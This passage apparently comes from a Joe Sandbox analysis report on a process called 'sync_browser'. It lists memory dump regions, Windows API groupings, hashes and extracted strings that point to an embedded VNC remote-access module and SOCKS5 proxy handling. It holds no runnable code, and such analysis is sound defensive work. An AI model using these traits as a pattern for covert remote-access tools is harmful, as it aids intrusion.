                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterEventLeave
                                                                    • String ID:
                                                                    • API String ID: 3772564070-0
                                                                    • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction ID: c3d42b0512295a3651866cf98ac16d4326bc08d5d9aa1ad858744b2343a339b0
                                                                    • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                    • Instruction Fuzzy Hash: 2221C92591DA46C1FB18BB55F894778A360AF88B84FC40032C90E477B5DF3DB589C722
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 540623443-0
                                                                    • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                    • Instruction ID: 32ef1e92d1d9252a6c4abfe6e99fb515e14c85c249cfcf4b08d611cfe5c325f3
                                                                    • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                    • Instruction Fuzzy Hash: 30113C32A2CA46C6DB85FF61E4506A8A3A4FF48B84F905131DA4E46728DF7CE055C720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Escape$Release
                                                                    • String ID:
                                                                    • API String ID: 2350829361-0
                                                                    • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction ID: 8149ba80a5d4cc05a2f1f482f3c80167eb0be14e63638e34200df9d2738baed8
                                                                    • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                    • Instruction Fuzzy Hash: 5BF06D3661864283E720AB20B955A2AB2A1FB88784F945135DE5A02F28CE3CE0118B14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recvsend
                                                                    • String ID: Enter SOCKS5 password for %s@%s:
                                                                    • API String ID: 740075404-2439350543
                                                                    • Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                    • Instruction ID: 3a900d9838d1cdf1a7b253c693eb5d42479308f4fdea3138675b053b35514bde
                                                                    • Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                    • Instruction Fuzzy Hash: 6351A26260CAC1C4E760AB29A4403B9AA91FB457A8F945335EFBD43BE9DE3CE5058710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: SecureVNC;0;0x%08x;%s
                                                                    • API String ID: 2959964966-2465057312
                                                                    • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                    • Instruction ID: ea9cf58f9fa061ddd821104e9879147f59622545a3150dce1814922a5d3251ec
                                                                    • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                    • Instruction Fuzzy Hash: 58218132B1C712C9E719FF61A8405ADB6A5BB087A8B980136EE5C53B9CCF38E801C350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: B
                                                                    • API String ID: 2959964966-1255198513
                                                                    • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                    • Instruction ID: 9cd6ec24a46cde05727221b9ff9728ba61ccec3d9b78c7b2d377cbb999b207a2
                                                                    • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                    • Instruction Fuzzy Hash: 85112E3261C741C6EB24BB55A44027DB6A0FB88B94F984231EF9D07BA9CF3CE540CB15
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                    • String ID: <
                                                                    • API String ID: 2439412506-4251816714
                                                                    • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                    • Instruction ID: 7694948d2e6c2010ff9c9b279233f2acf990acbcfc8746dd58873b7721b8802d
                                                                    • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                    • Instruction Fuzzy Hash: 96114F7261C641C6EB50AF16F4107AAB360FB88B48F945031EB8D07B69CF3DE946CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: I
                                                                    • API String ID: 2959964966-3707901625
                                                                    • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                    • Instruction ID: 750e9957390098f1abc241082e38842df8bfb349ce2c97c94bfc0a8884bc4ae2
                                                                    • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                    • Instruction Fuzzy Hash: 72115E72A0C744C5EB24AB52A540379B7A5FB94BE0F584235EE9C07BA9CF3CE545CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$MappingOpenView
                                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                    • API String ID: 3439327939-3305976270
                                                                    • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                    • Instruction ID: c05865ca8af7d15f156d9aa7949b5c08790143b339323b28d31ddbbb42000093
                                                                    • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                    • Instruction Fuzzy Hash: 1701523250DB94C5E720DB65F441659F390FB85764F854235D6A906B98CF7CE450C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$MappingOpenView
                                                                    • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                    • API String ID: 3439327939-2897898322
                                                                    • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                    • Instruction ID: 8095f71491b8c3d3f5226655a5f7c8c50bea959409c4ce13e420bff4aa42f9ba
                                                                    • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                    • Instruction Fuzzy Hash: 3D01527250DB91C6E720DBA5F44165AB3A0FB88764F854335DAA907B98CF7CE051C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: DllGetVersion
                                                                    • API String ID: 3013587201-2861820592
                                                                    • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                    • Instruction ID: 3ffd4f9e9431f9c39817752d1f4a5bc58bfa0b23879f8b06250f521b237c8489
                                                                    • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                    • Instruction Fuzzy Hash: 0C01213161C741C2E714AF55B48017AB6A0FB88794F845139FA9E42B68DF3CE554CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection
                                                                    • String ID: vncclient.cpp : update thread gone
                                                                    • API String ID: 166494926-1446885542
                                                                    • Opcode ID: 9e3f7b4cbe2ea9e43e15b535a150d417f1769ce92df595d026cef6ea7500f3eb
                                                                    • Instruction ID: 8f7376c3585d5ef0f6a8b175b85dc2becacbd10428f4cfc77312be31e20e0743
                                                                    • Opcode Fuzzy Hash: 9e3f7b4cbe2ea9e43e15b535a150d417f1769ce92df595d026cef6ea7500f3eb
                                                                    • Instruction Fuzzy Hash: D2016925A0CB82D1D610BB10E5403B8A321FB44BA4F944231CA6D07BB9DF3DF1558320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageObjectSendSingleWait
                                                                    • String ID: vncclient.cpp : client Kill() called
                                                                    • API String ID: 353115698-1198714380
                                                                    • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction ID: ced20c2c4a4051d1a2f37adf65e293d6ac52df0ffdb942cba36e556ef40de540
                                                                    • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction Fuzzy Hash: 55017132A09981C1FB58BF25E4557A9A361EF88B74F844235CA3C067E9CF38E894C390
                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097338
                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097352
                                                                    • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF74009739C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF7400973E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInitializeLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 3200804837-0
                                                                    • Opcode ID: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
                                                                    • Instruction ID: 2536f5d9dc01b5b712e38719f3cc849b044e114fc31f6108ca678e07e1cb6b5f
                                                                    • Opcode Fuzzy Hash: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
                                                                    • Instruction Fuzzy Hash: 5321F832A1DB42D1EA05BF11E990668B3A4FF49B94B848035DA8D037A8DF3CF5658721